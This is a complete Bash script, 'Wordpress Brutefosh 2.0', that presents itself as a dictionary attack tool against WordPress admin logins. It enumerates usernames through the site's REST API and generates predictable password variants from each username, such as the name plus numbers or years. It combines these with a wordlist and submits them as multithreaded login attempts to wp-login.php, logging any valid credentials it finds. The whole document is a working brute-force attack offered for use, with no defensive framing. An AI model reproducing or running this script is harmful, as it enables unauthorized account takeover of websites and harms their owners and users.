[BASH] Wordpress Brutefosh 2.0 - Auto Generate Password

1. #!/bin/bash
2. # Name       : Wordpress Brutefosh
3. # Version    : 2.0
4. # Desc.      : Dictionary Attack Tool - Wordpress Admin
5. # Updated on : 2019-03-29
6.  
7. #----------- CONFIGURATION -----------
8. curl_timeout=20
9. multithread_limit=10
10. #--------- CONFIGURATION EOF ---------
11.  
12. if [[ -f wpusername.tmp ]]
13. then
14.     rm wpusername.tmp
15. fi
16.  
17. RED='\e[31m'
18. GRN='\e[32m'
19. YEL='\e[33m'
20. CLR='\e[0m'
21.  
22. function _GetUserWPJSON() {
23.     Target="${1}";
24.     UsernameLists=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")');
25.     echo ""
26.     if [[ -z ${UsernameLists} ]];
27.     then
28.         echo -e "${YEL}INFO: Cannot detect Username!${CLR}"
29.     else
30.         echo -ne > wpusername.tmp
31.         for Username in ${UsernameLists};
32.         do
33.             echo "INFO: Found username \"${Username}\"..."
34.             echo "${Username}" >> wpusername.tmp
35.         done
36.     fi
37. }
38.  
39. function _TestLogin() {
40.     Target="${1}"
41.     Username="${2}"
42.     Password="${3}"
43.     LetsTry=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s -w "\nHTTP_STATUS_CODE_X %{http_code}\n" "${Target}/wp-login.php" --data "log=${Username}&pwd=${Password}&wp-submit=Log+In" --compressed)
44.     if [[ ! -z $(echo ${LetsTry} | grep login_error | grep div) ]];
45.     then
46.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
47.     elif [[ $(echo ${LetsTry} | grep "HTTP_STATUS_CODE_X" | awk '{print $2}') == "302" ]];
48.     then
49.         echo -e "${GRN}[!] FOUND ${Target} \e[30;48;5;82m ${Username}:${Password} ${CLR}"
50.         echo "${Target} [${Username}:${Password}]" >> wpbf-results.txt
51.     else
52.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
53.     fi
54. }
55.  
56. function PasswdGenerator() {
57.     WORD="${1}"
58.     echo "${WORD}"
59.     echo "${WORD}" | tr a-z A-Z
60.     echo "${WORD}123"
61.     echo "${WORD}123" | tr a-z A-Z
62.     echo "${WORD}admin"
63.     echo "${WORD}${WORD}"
64.     echo "${WORD}${WORD}123"
65.     echo "${WORD}${WORD}" | tr a-z A-Z
66.     echo "${WORD}${WORD}123" | tr a-z A-Z
67.     foo=${WORD:0};echo ${foo^}
68.     foo=${WORD:0};echo ${foo^}123
69.     for ((c=1;c<=99;c++))
70.     do
71.         echo "${WORD}${c}"
72.     done
73.     for ((c=1;c<=9;c++))
74.     do
75.         echo "${WORD}0${c}"
76.     done
77.     for ((c=1900;c<=$(date +%Y);c++))
78.     do
79.         echo "${WORD}${c}"
80.     done
81.     for ((c=1;c<=99;c++))
82.     do
83.         foo=${WORD:0};echo ${foo^}${c}
84.     done
85.     for ((c=1;c<=9;c++))
86.     do
87.         foo=${WORD:0};echo ${foo^}0${c}
88.     done
89.     for ((c=1900;c<=$(date +%Y);c++))
90.     do
91.         foo=${WORD:0};echo ${foo^}${c}
92.     done
93. }
94.  
95. echo ' _    _               _                         '
96. echo '| |  | | ___  _ __ __| |_ __  _ __ ___  ___ ___ '
97. echo '| |/\| |/ _ \| `__/ _` | `_ \| `__/ _ \/ __/ __|'
98. echo '\  /\  / (_) | | | (_| | |_) | | |  __/\__ \__ \'
99. echo ' \/  \/ \___/|_|  \__,_| .__/|_|  \___||___/___/'
100. echo '                       |_|.::Brutefo(sh) 2019::.'
101. echo ''
102.  
103. echo -ne "[?] Input website target : "
104. read Target
105.  
106. curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-login.php" > wplogin.tmp
107. if [[ -z $(cat wplogin.tmp | grep "wp-submit") ]];
108. then
109.     echo -e "${RED}ERROR: Invalid wordpress wp-login!${CLR}"
110.     exit
111. fi
112.  
113. echo -ne "[?] Input password lists in (file) : "
114. read PasswordLists
115.  
116. if [[ ! -f ${PasswordLists} ]]
117. then
118.     echo -e "${RED}ERROR: Wordlists not found!${CLR}"
119.     PasswordLists=/dev/null
120. fi
121.  
122. _GetUserWPJSON ${Target}
123.  
124. if [[ -f wpusername.tmp ]]
125. then
126.     for User in $(cat wpusername.tmp)
127.     do
128.         echo "INFO: Generate password from ${User}..."
129.         echo -ne "" > wpbf-passwords.lst.tmp
130.         PasswdGenerator ${User} >> wpbf-passwords.lst.tmp
131.         cat ${PasswordLists} >> wpbf-passwords.lst.tmp
132.         (
133.             for Pass in $(cat wpbf-passwords.lst.tmp)
134.             do
135.                 ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
136.                 _TestLogin ${Target} ${User} ${Pass} &
137.             done
138.             wait
139.         )
140.     done
141.     echo -ne "" > wpbf-passwords.lst.tmp
142.     rm wpbf-passwords.lst.tmp
143. else
144.     echo -e "${YEL}INFO: Cannot find username${CLR}"
145.     echo -ne "[?] Input username manually : "
146.     read User
147.     if [[ -z ${User} ]]
148.     then
149.         echo -e "${RED}ERROR: Username cannot be empty!${CLR}"
150.         exit
151.     fi
152.     echo "INFO: Generate password from ${User}..."
153.     echo -ne "" > wpbf-passwords.lst.tmp
154.     PasswdGenerator ${User} >> wpbf-passwords.lst.tmp
155.     cat ${PasswordLists} >> wpbf-passwords.lst.tmp
156.     (
157.         for Pass in $(cat wpbf-passwords.lst.tmp)
158.         do
159.             ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
160.             _TestLogin ${Target} ${User} ${Pass} &
161.         done
162.         wait
163.     )
164.     echo -ne "" > wpbf-passwords.lst.tmp
165.     rm wpbf-passwords.lst.tmp
166. fi
167. echo "INFO: Found $(cat wpbf-results.txt | grep ${Target} | sort -nr | uniq | wc -l) username & password in ./wpbf-results.txt"